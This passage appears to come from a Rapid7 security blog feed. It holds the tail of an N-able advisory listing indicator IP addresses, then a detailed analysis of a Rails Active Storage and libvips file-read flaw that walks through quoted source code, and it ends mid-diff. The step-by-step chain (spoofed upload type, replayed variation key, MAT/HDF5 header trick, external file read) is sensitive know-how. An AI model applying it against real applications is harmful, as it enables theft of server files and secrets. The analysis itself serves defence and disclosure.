data-type='inlineCode'>173[.]249[.]252[.]200</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>87[.]249[.]138[.]34</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>37[.]19[.]210[.]32</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>37[.]153[.]90[.]88</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>92[.]118[.]112[.]181</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>68[.]235[.]46[.]214 </span></span></p></li></ul></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations should also review:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Authentication logs</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Administrative account creation or modification</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Take Control session activity</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Remote management logs</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Windows service installation events</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>To assist affected organizations running N-central, the vendor has provided a </span><a href="https://developer.n-able.com/n-central/recipes/cve-2026-18577-detection"><span style='font-size: undefined;'>detection template</span></a><span style='font-size: undefined;'> for CVE-2026-18577, which organizations can use to help identify potential compromise.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-18577 and CVE-2026-18556 with vulnerability checks available in the August 4 content release. Note that potential check type must be enabled in the scan template before scanning.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 4, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>August 4, 2026:</strong></span><span style='font-size: undefined;'> Updated Rapid7 customers section to reflect the availability of vulnerability checks.</span></li><li><span style='font-size: undefined;'><strong>August 7, 2026: </strong></span><span style='font-size: undefined;'>Updated the Overview and Rapid7 Customers sections to indicate addition of CVE-2026-18556 to CISA KEV and availability of vulnerability checks.</span></li><li><span style='font-size: undefined;'><strong>August 14, 2026:</strong></span><span style='font-size: undefined;'> Updated the Overview and Mitigation guidance sections to include the new vendor guidance that 2026.3 Hotfix 2 supersedes the original 2026.3 Hotfix 1.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-18577-n-able-n-central-authentication-bypass-exploited-in-the-wild</link>
      <guid isPermaLink="false">bltda2d23fd03973544</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Tue, 04 Aug 2026 11:11:54 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Analysis: KindaRails2Shell (CVE-2026-66066)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 29, 2026, the Ruby on Rails project published a </span><a href="https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-66066/"><span style='font-size: undefined;'>CVE-2026-66066</span></a><span style='font-size: undefined;'>, an arbitrary file read in Active Storage applications that use the Vips image processor with untrusted uploads. The affected Active Storage ranges are </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt; 7.2.3.2</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&gt;= 8.0, &lt; 8.0.5.1</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&gt;= 8.1, &lt; 8.1.3.1</span></span><span style='font-size: undefined;'>. Vips is the default Active Storage variant processor for applications that load Rails 7.0 or later defaults. Rails 6 applications are affected only when they explicitly configure Vips.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our </span><a href="https://www.rapid7.com/blog/post/etr-kindarails2shell-cve-2026-66066-critical-arbitrary-file-read-and-possible-remote-code-execution-in-ruby-on-rails/"><span style='font-size: undefined;'>Emergent Threat Response blog</span></a><span style='font-size: undefined;'> covers the affected versions, mitigation guidance, and current exploitation status. This post traces the request from the direct-upload endpoint to the HDF5 read, then shows how the arbitrary file read can expose Rails signing material and become code execution. </span><span style='font-size: undefined;'><strong>A vulnerable application can disclose arbitrary files before the attacker has recovered a Rails secret or forged a token.</strong></span><span style='font-size: undefined;'> A genuine Active Storage </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>variation_key</span></span><span style='font-size: undefined;'> from the same application, paired with a direct-upload blob whose stored </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>content_type</span></span><span style='font-size: undefined;'> claims to be an image, is enough to reach a libvips loader that turns a crafted MAT/HDF5 file into an arbitrary file-read oracle.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>We reproduced the published chain against Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>6.0.6.1</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>6.1.7.10</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2.3.1</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.3</span></span><span style='font-size: undefined;'>, and confirmed that patched </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2.3.2</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5.1</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.3.1</span></span><span style='font-size: undefined;'> targets block the crafted representation. We also validated a remote code execution (RCE) path that uses only JSON-compatible </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Hash</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Array</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>String</span></span><span style='font-size: undefined;'> values in a signed variation. That path reaches </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Kernel#spawn</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Kernel#eval</span></span><span style='font-size: undefined;'> through ImageProcessing's chain builder, and it worked when Rails was configured with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>config.active_support.message_serializer = :json</span></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The advisory covers the vulnerable Active Storage configuration. The MAT/HDF5 representation chain shown here has narrower requirements. The deployed libvips build must expose </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'> with MAT 7.3/HDF5 support, the application must preserve an attacker-supplied </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>content_type</span></span><span style='font-size: undefined;'>, and the attacker must be able to trigger a representation, for example with a genuine variation key. Those requirements narrow where this particular chain works, but the underlying issue is that Active Storage handed untrusted uploads to libvips operations that libvips already marked unsafe for untrusted content.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The attack can be summarized as follows:</span></p><p><span style='font-size: undefined;'></span></p><pre language="shell-session">[Attacker]
   |
   | 1. Creates a direct-upload blob with content_type = image/png
   v
[Rails stores the blob as an image without examining the bytes]
   |
   | 2. Reuses a genuine variation_key from the same application
   v
[Rails accepts the blob as variable and starts a representation]
   |
   | 3. image_processing hands the local tempfile path to libvips
   v
[libvips matload]
   |
   | 4. Bytes 0-9 match "MATLAB 5.0"
   v
[libmatio]
   |
   | 5. Bytes 124-125 contain MAT_FT_MAT73 (0x0200)
   v
[HDF5 external storage]
   |
   | 6. Dataset bytes come from attacker-chosen path + offset
   v
[Rendered PNG representation]
   |
   --&gt; Target file bytes are returned as image pixels</pre><h2 style="direction: ltr;">Analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The published chain contains two separate trust failures. Rails decides that a blob is an image from a database value, while libvips decides what parser to use from the bytes on disk. Once the file reaches </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'>, libvips and libmatio disagree again about the same MAT header. libvips only looks at the first ten bytes, while libmatio selects the MAT version from bytes 124 and 125.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Direct upload stores an attacker-controlled type</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The standard direct-upload endpoint creates the blob record before the service receives the file. In Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ActiveStorage::DirectUploadsController#create</span></span><span style='font-size: undefined;'> accepts </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>content_type</span></span><span style='font-size: undefined;'> directly from the request and passes it into </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>create_before_direct_upload!</span></span><span style='font-size: undefined;'>:</span></p><p></p><pre language="ruby">class ActiveStorage::DirectUploadsController &lt; ActiveStorage::BaseController
  def create
    blob = ActiveStorage::Blob.create_before_direct_upload!(**blob_args) # &lt;-- [1]
    render json: direct_upload_json(blob)
  end

  private
    def blob_args
      params.expect(blob: [:filename, :byte_size, :checksum, :content_type, metadata: {}]).to_h.symbolize_keys # &lt;-- [2]
    end</pre><pre language="ruby">    def create_before_direct_upload!(key: nil, filename:, byte_size:, checksum:, content_type: nil, metadata: nil, service_name: nil, record: nil)
      metadata = filter_metadata(metadata)
      create! key: key, filename: filename, byte_size: byte_size, checksum: checksum, content_type: content_type, metadata: metadata, service_name: service_name # &lt;-- [3]
    end</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, the endpoint accepts </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>content_type</span></span><span style='font-size: undefined;'> from the client. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'>, Active Storage writes that value directly to the blob record. The direct-upload path never runs the server-side </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>unfurl</span></span><span style='font-size: undefined;'> flow that would identify the bytes with Marcel. When we uploaded the same crafted file through a normal multipart attachment in the lab, Rails re-identified it as MATLAB data before variant processing, so it did not pass the image gate.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once the direct-upload blob exists, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Blob#variable?</span></span><span style='font-size: undefined;'> uses only the stored database value to decide whether the blob can be transformed. On the representation path, no built-in previewer accepts </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>image/png</span></span><span style='font-size: undefined;'>, so the blob falls through to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>variant</span></span><span style='font-size: undefined;'>:</span></p><p></p><pre language="ruby">  def variant(transformations)
    if variable?
      variant_class.new(self, ActiveStorage::Variation.wrap(transformations).default_to(default_variant_transformations))
    else
      raise ActiveStorage::InvariableError, "Can't transform blob with ID=#{id} and content_type=#{content_type}"
    end
  end

  # Returns true if the variant processor can transform the blob (its content
  # type is in +ActiveStorage.variable_content_types+).
  def variable?
    ActiveStorage.variable_content_types.include?(content_type) # &lt;-- [4]
  end</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[4]</span></span><span style='font-size: undefined;'>, Rails performs a set-membership check against the stored </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>content_type</span></span><span style='font-size: undefined;'>. No file bytes are examined. A crafted MAT/HDF5 object stored as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>image/png</span></span><span style='font-size: undefined;'> reaches the image variant pipeline.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>A genuine variation key can be replayed against another blob</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The standard representation route accepts a signed blob ID and a signed variation key as separate parameters. Rails resolves them independently:</span></p><p></p><pre language="ruby">module ActiveStorage::SetBlob # :nodoc:
  extend ActiveSupport::Concern

  included do
    before_action :set_blob
  end

  private
    def set_blob
      @blob = blob_scope.find_signed!(params[:signed_blob_id] || params[:signed_id]) # &lt;-- [5]
    rescue ActiveSupport::MessageVerifier::InvalidSignature
      head :not_found
    end

    def blob_scope
      ActiveStorage::Blob
    end
end</pre><pre language="ruby">class ActiveStorage::Representations::BaseController &lt; ActiveStorage::BaseController # :nodoc:
  include ActiveStorage::SetBlob

  before_action :set_representation

  private
    def blob_scope
      ActiveStorage::Blob.scope_for_strict_loading
    end

    def set_representation
      @representation = @blob.representation(params[:variation_key]).processed # &lt;-- [6]
    rescue ActiveSupport::MessageVerifier::InvalidSignature
      head :not_found
    end
end</pre><pre language="ruby">    # Returns a Variation instance with the transformations that were encoded by +encode+.
    def decode(key)
      new ActiveStorage.verifier.verify(key, purpose: :variation) # &lt;-- [7]
    end</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[5]</span></span><span style='font-size: undefined;'>, Rails verifies the blob ID. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[6]</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[7]</span></span><span style='font-size: undefined;'>, it separately verifies the variation key and applies it to that blob. There is no cross-check between the two signed values. An attacker can copy a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>variation_key</span></span><span style='font-size: undefined;'> from any representation URL emitted by the same application and replay it against the signed ID of a newly created direct-upload blob. The file-read stage does not require </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secret_key_base</span></span><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>The Vips pipeline leaves decoder selection to libvips</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active Storage then hands the tempfile path to image_processing. The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>loader(page: 0)</span></span><span style='font-size: undefined;'> call below can be misleading. It stores options for whichever loader libvips chooses later rather than choosing a loader itself:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="ruby">def process(file, format:)
  processor.
	source(file).
	loader(page: 0). # &lt;-- [8]
	convert(format).
	apply(operations). # &lt;-- [9]
	call
end
def processor
  ImageProcessing.const_get(ActiveStorage.variant_processor.to_s.camelize)
end
def operations
  transformations.each_with_object([]) do |(name, argument), list|
	if ActiveStorage.variant_processor == :mini_magick
	  validate_transformation(name, argument) # &lt;-- [10]
	end
	if name.to_s == "combine_options"
	  raise ArgumentError, &lt;&lt;~ERROR.squish
		Active Storage's ImageProcessing transformer doesn't support :combine_options,
		as it always generates a single command.
	  ERROR
	end
	if argument.present?
	  list &lt;&lt; [ name, argument ] # &lt;-- [11]
	end
  end
end</pre><p><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[8]</span></span><span style='font-size: undefined;'>, no decoder has been named yet. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[9]</span></span><span style='font-size: undefined;'>, Rails forwards the signed transformation list into image_processing. For RCE, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[10]</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[11]</span></span><span style='font-size: undefined;'> matter because </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>:mini_magick</span></span><span style='font-size: undefined;'> transformations pass through </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>validate_transformation</span></span><span style='font-size: undefined;'>, while Vips transformations do not receive the same method-name validation.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In image_processing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1.14.0</span></span><span style='font-size: undefined;'>, the path later reaches </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Vips::Image.new_from_file</span></span><span style='font-size: undefined;'>:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="ruby">def self.load_image(path_or_image, loader: nil, autorot: true, **options)
	if path_or_image.is_a?(::Vips::Image)
	  image = path_or_image
	else
	  path = path_or_image
	  if loader
		image = ::Vips::Image.public_send(:"#{loader}load", path, **options)
	  else
		options = Utils.select_valid_loader_options(path, options)
		image = ::Vips::Image.new_from_file(path, **options) # &lt;-- [12]
	  end
	end
	image = image.autorot if autorot && !options.key?(:autorotate)
	image
  end</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>loader:</span></span><span style='font-size: undefined;'> remains </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>nil</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[12]</span></span><span style='font-size: undefined;'> leaves decoder selection to libvips's file sniffers.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>libvips and libmatio disagree about the MAT header</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In libvips </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.16.1</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'> is marked as untrusted. Vulnerable Active Storage releases did not block untrusted operations before processing attacker-controlled uploads:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="c">static void
vips_foreign_load_mat_class_init(VipsForeignLoadMatClass *class)
{
	/* ... omitted: class initialization ... */

	operation_class-&gt;flags |= VIPS_OPERATION_UNTRUSTED; // &lt;-- [13]

	foreign_class-&gt;suffs = vips__mat_suffs;

	load_class-&gt;is_a = vips__mat_ismat; // &lt;-- [14]</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The entire libvips MAT sniffer is a ten-byte prefix check:</span></p><p><span style='font-size: undefined;'></span></p><pre language="c">int
vips__mat_ismat(const char *filename)
{
	unsigned char buf[15];

	if (vips__get_bytes(filename, buf, 10) == 10 &&
		vips_isprefix("MATLAB 5.0", (char *) buf)) // &lt;-- [15]
		return 1;

	return 0;
}</pre><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[13]</span></span><span style='font-size: undefined;'>, libvips marks </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'> as untrusted. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[14]</span></span><span style='font-size: undefined;'>, it registers </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vips__mat_ismat</span></span><span style='font-size: undefined;'> as the loader's sniffer. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[15]</span></span><span style='font-size: undefined;'>, a file only needs to begin with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB 5.0</span></span><span style='font-size: undefined;'> for libvips to select </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'>. A genuine MAT 7.3 file begins with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB 7.3 MAT-file</span></span><span style='font-size: undefined;'>, so it fails this check.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In libmatio </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1.5.28</span></span><span style='font-size: undefined;'>, the descriptive text is not the format selector. libmatio reads the fixed version field at bytes 124 and 125:</span></p><p></p><pre language="c">enum mat_ft
{
    MAT_FT_MAT73 = 0x0200, /**&lt; @brief Matlab version 7.3 file */ // &lt;-- [16]
    MAT_FT_MAT5 = 0x0100,  /**&lt; @brief Matlab version 5 file   */
    MAT_FT_MAT4 = 0x0010,  /**&lt; @brief Matlab version 4 file   */
    MAT_FT_UNDEFINED = 0   /**&lt; @brief Undefined version       */
};</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[16]</span></span><span style='font-size: undefined;'>, libmatio defines </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>0x0200</span></span><span style='font-size: undefined;'> as the MAT 7.3 format identifier.</span></p><p></p><pre language="c">Mat_Open(const char *matname, int mode)
{
    FILE *fp = NULL;
    mat_int16_t tmp, tmp2;
    mat_t *mat = NULL;
    size_t bytesread = 0;

    /* ... omitted: file opening and allocation ... */

    bytesread += fread(mat-&gt;header, 1, 116, fp);
    mat-&gt;header[116] = '\0';
    bytesread += fread(mat-&gt;subsys_offset, 1, 8, fp);
    bytesread += 2 * fread(&tmp2, 2, 1, fp);
    bytesread += fread(&tmp, 1, 2, fp);

    if ( 128 == bytesread ) {
        /* v5 and v7.3 files have at least 128 byte header */
        mat-&gt;byteswap = -1;
        if ( tmp == 0x4d49 )
            mat-&gt;byteswap = 0;
        else if ( tmp == 0x494d ) {
            mat-&gt;byteswap = 1;
            Mat_int16Swap(&tmp2);
        }

        mat-&gt;version = (int)tmp2; // &lt;-- [17]
        if ( (mat-&gt;version == 0x0100 || mat-&gt;version == 0x0200) && -1 != mat-&gt;byteswap ) {
            mat-&gt;bof = ftello((FILE *)mat-&gt;fp);
            if ( mat-&gt;bof == -1L ) {
                free(mat-&gt;header);
                free(mat-&gt;subsys_offset);
                free(mat);
                fclose(fp);
                Mat_Critical("Couldn't determine file position");
                return NULL;
            }
            mat-&gt;next_index = 0;
        } else {
            mat-&gt;version = 0;
        }
    }</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[17]</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Mat_Open</span></span><span style='font-size: undefined;'> stores the two-byte version field read from bytes 124 and 125 in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>mat-&gt;version</span></span><span style='font-size: undefined;'>. This is separate from the descriptive text that libvips already accepted at the beginning of the file.</span></p><p></p><pre language="c">static int
ReadData(mat_t *mat, matvar_t *matvar)
{
    if ( mat == NULL || matvar == NULL || mat-&gt;fp == NULL )
        return MATIO_E_BAD_ARGUMENT;
    else if ( mat-&gt;version == MAT_FT_MAT5 )
        return Mat_VarRead5(mat, matvar);
#if defined(MAT73) && MAT73
    else if ( mat-&gt;version == MAT_FT_MAT73 )
        return Mat_VarRead73(mat, matvar); // &lt;-- [18]
#endif
    else if ( mat-&gt;version == MAT_FT_MAT4 )
        return Mat_VarRead4(mat, matvar);
    return MATIO_E_FAIL_TO_IDENTIFY;
}</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[18]</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ReadData</span></span><span style='font-size: undefined;'> dispatches </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MAT_FT_MAT73</span></span><span style='font-size: undefined;'> into the HDF5-backed reader. A crafted file can therefore say </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB 5.0</span></span><span style='font-size: undefined;'> to libvips while still entering MAT 7.3 handling in libmatio. HDF5 userblocks make this possible: the crafted file can place a valid HDF5 superblock after a 512-byte leading block that contains the spoofed MAT header.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>HDF5 datasets can use an external backing file, including a caller-chosen path and byte offset. libmatio eventually asks HDF5 to read the dataset:</span></p><p></p><pre language="c">static int
Mat_H5ReadData(hid_t dset_id, hid_t h5_type, hid_t mem_space, hid_t dset_space, int isComplex, void *data)
{
    herr_t herr;

    if ( !isComplex ) {
        herr = H5Dread(dset_id, h5_type, mem_space, dset_space, H5P_DEFAULT, data); // &lt;-- [19]
        if ( herr &lt; 0 ) {
            return MATIO_E_GENERIC_READ_ERROR;
        }</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Before </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[19]</span></span><span style='font-size: undefined;'>, this read path does not check </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>H5Pget_external_count()</span></span><span style='font-size: undefined;'>. HDF5 resolves the external storage entry and copies bytes from the attacker-selected file into the MAT variable's data buffer. libvips then treats those bytes as image pixels and Active Storage returns them in the rendered representation.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The header mismatch also leaves a useful content signature. In the first 128 bytes, the file claims </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB 5.0</span></span><span style='font-size: undefined;'> at bytes 0 through 9, but carries the MAT 7.3 version and endian tag at bytes 124 through 127. A normal MAT 5 file has the text but not the MAT 7.3 tag. A normal MAT 7.3 file has the tag but not the text.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Why variants are not required</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>A returned representation is the easiest way to get bytes back, but the advisory states that generating variants is not a separate requirement. Active Storage can also reach </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Vips::Image.new_from_file</span></span><span style='font-size: undefined;'> during image analysis after a blob is attached. Rails's forensic repository documents a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB_empty</span></span><span style='font-size: undefined;'> variant in which libmatio reads external bytes while deriving an empty array's dimensions, so those bytes can surface as width and height instead of pixel values. That route does not depend on preserving pixel values.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Representation is one way to trigger the loader. That route needs a direct-upload blob, a representation trigger, and a way to see the image that comes back. The analyzer path can reach the same loader without returning a variant, although the attacker still needs some way to observe the resulting metadata or logs. For exploitation, the returned PNG is more useful because it carries far more data per request.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Why the patch works</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The relevant </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>v8.0.5</span></span><span style='font-size: undefined;'> to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>v8.0.5.1</span></span><span style='font-size: undefined;'> diff does not add another content-type check. Instead, it loads a new Active Storage Vips initializer from the analyzer path and disables the libvips operations that libvips itself already marks as untrusted:</span></p><p></p><pre language="diff">diff --git a/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb b/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb
index 7e682b3b75fda..e262e1a842aa4 100644
--- a/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb
